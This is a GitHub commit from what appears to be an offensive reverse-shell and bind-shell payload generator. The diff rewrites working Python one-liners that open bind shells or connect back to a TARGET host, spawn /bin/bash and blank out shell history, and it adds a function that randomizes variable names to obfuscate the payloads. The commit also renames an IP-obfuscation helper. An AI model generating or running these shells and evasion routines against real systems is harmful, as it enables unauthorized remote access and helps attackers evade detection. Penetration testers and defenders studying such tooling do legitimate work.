Added variable randomization functionality

gugafer · Jul 14, 2018 · 5c513c7 · 5c513c7
1 parent a9ebd5c
commit 5c513c7
Show file tree

Hide file tree

Showing 4 changed files with 48 additions and 7 deletions.
diff --git a/src/bind.py b/src/bind.py
@@ -3,11 +3,11 @@
 # Bind TCP shells
 
 def BIND_PYTHON_TCP():
-    return """python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(('',PORT));s.listen(1);conn,addr=s.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" """
+    return """python -c "import socket,subprocess,os;VAR1=socket.socket(socket.AF_INET,socket.SOCK_STREAM);VAR1.bind(('',PORT));VAR1.listen(1);conn,addr=VAR1.accept();os.dup2(conn.fileno(),0);os.dup2(conn.fileno(),1);os.dup2(conn.fileno(),2);VAR2=subprocess.call(['/bin/bash','-i'])" """
 
 
 def BIND_PYTHON_UDP():
-    return """python -c 'while 1: from subprocess import Popen,PIPE;from socket import socket, AF_INET, SOCK_DGRAM;s=socket(AF_INET,SOCK_DGRAM);s.bind(("0.0.0.0",PORT));data,addr=s.recvfrom(8096);out=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate();s.sendto("".join([out[0],out[1]]),addr)'"""
+    return """python -c 'while NUM1: from subprocess import Popen,PIPE;from socket import socket,AF_INET,SOCK_DGRAM;VAR1=socket(AF_INET,SOCK_DGRAM);VAR1.bind(("0.0.0.0",PORT));VAR2,VAR3=VAR1.recvfrom(8096);VAR4=Popen(VAR2,shell=True,stdout=PIPE,stderr=PIPE).communicate();VAR1.sendto("".join([VAR4[0],VAR4[1]]),VAR3)'"""
 
 
 def BIND_PERL_TCP():

diff --git a/src/classes.py b/src/classes.py
@@ -1,3 +1,4 @@
+from obfuscators import randomize_vars
 from encoders import powershell_base64, xor, to_unicode, to_urlencode
 from binascii import hexlify
 from binary import shellcode_to_hex, shellcode_to_ps1, WINDOWS_BLOODSEEKER_SCRIPT # imported since 0.3.6
@@ -186,6 +187,9 @@ def get(self):
 
             # Apply powershell-tuning if set in args.
             self.code = powershell_wrapper(self.name, self.code, self.args)
+
+            # Apply variable randomization
+            self.code = randomize_vars(self.code, self.args.obfuscate_small)
         else:
             # Custom shell. Here we need to program individually based in specifics.
             # TODO: I need to separate this into a custom file.
@@ -246,6 +250,9 @@ def get(self):
         # Apply powershell-tuning if set in args.
         self.code = powershell_wrapper(self.name, self.code, self.args)
 
+        # Apply variable randomization
+        self.code = randomize_vars(self.code, self.args.obfuscate_small)
+
         # Apply xor encoding.
         self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)
 

diff --git a/src/obfuscators.py b/src/obfuscators.py
@@ -1,4 +1,38 @@
 import os
+import random
+import re
+import string
+
+def randomize_vars(code, smallVars):
+    nums = re.findall("NUM\d", code)
+    vars = re.findall("VAR\d", code)
+
+    if smallVars:
+        maxNum = 999
+    else:
+        maxNum = 9999999
+
+    for num in nums:
+        code = code.replace(num, str(random.randint(0, maxNum)))
+
+    for var in vars:
+        code = code.replace(var, gen_random_var(smallVars))
+
+    return code
+
+def gen_random_var(smallVars):
+    if smallVars:
+        minVarLen = 3
+        maxVarLen = 6
+    else:
+        minVarLen = 6
+        maxVarLen = 15
+
+    randVarLen = random.randint(minVarLen, maxVarLen)
+    randomVar = "".join(string.ascii_letters[ord(os.urandom(1)) % 52] for x in range(randVarLen))
+
+    return randomVar
+
 
 def ipfuscate(ip, smallIP):
     """
@@ -10,7 +44,7 @@ def ipfuscate(ip, smallIP):
     parts = ip.split('.')
 
     if not smallIP:
-        ip = randomBaseIPgen(parts, smallIP)
+        ip = random_base_ip_gen(parts, smallIP)
 
     else:
         type = ord(os.urandom(1)) % 4
@@ -23,11 +57,11 @@ def ipfuscate(ip, smallIP):
         elif type == 2:
             ip = oct(decimal)
         else:
-            ip = randomBaseIPgen(parts, smallIP)
+            ip = random_base_ip_gen(parts, smallIP)
 
     return str(ip)
 
-def randomBaseIPgen(parts, smallIP):
+def random_base_ip_gen(parts, smallIP):
     """
     Used by ipfuscate(), returns an obfuscated IP with random bases.
     Code borrowed from @vysecurity (https://github.com/vysec/IPFuscator)

diff --git a/src/reverse.py b/src/reverse.py
@@ -4,11 +4,11 @@
 
 
 def REV_PYTHON_TCP():
-    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
+    return """python -c \"import os;import pty;import socket;VAR1='TARGET';VAR2=PORT;VAR3=socket.socket(socket.AF_INET,socket.SOCK_STREAM);VAR3.connect((VAR1,VAR2));os.dup2(VAR3.fileno(),0);os.dup2(VAR3.fileno(),1);os.dup2(VAR3.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');VAR3.close();\" """
 
 
 def REV_PYTHON_UDP():
-    return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """
+    return """python -c \"import os;import pty;import socket;VAR1='TARGET';VAR2=PORT;VAR3=socket.socket(socket.AF_INET,socket.SOCK_DGRAM);VAR3.connect((VAR1, VAR2)); os.dup2(VAR3.fileno(),0);os.dup2(VAR3.fileno(),1);os.dup2(VAR3.fileno(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');VAR3.close();\" """
 
 
 def REV_PHP_TCP():